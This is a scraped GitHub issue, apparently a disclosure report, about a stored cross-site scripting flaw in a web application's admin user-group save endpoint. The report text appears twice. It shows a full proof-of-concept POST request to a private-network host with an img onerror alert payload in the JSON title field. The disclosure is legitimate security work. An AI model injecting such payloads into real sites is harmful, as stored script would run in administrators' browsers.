Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
<img src=1 onerror=alert("xss");> url http://192.168.3.129:8091/admin1#userGroup/index poc POST /admin1/userGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 114 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/userGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close
{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"} then you can view xss in url http://192.168.3.129:8091/admin1#userGroup/index
The text was updated successfully, but these errors were encountered:
find by Chaitin Security Research Lab
Sorry, something went wrong.
No branches or pull requests
<img src=1 onerror=alert("xss");>

url
http://192.168.3.129:8091/admin1#userGroup/index
poc
POST /admin1/userGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 114
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/userGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}


then you can view xss in url
http://192.168.3.129:8091/admin1#userGroup/index
The text was updated successfully, but these errors were encountered: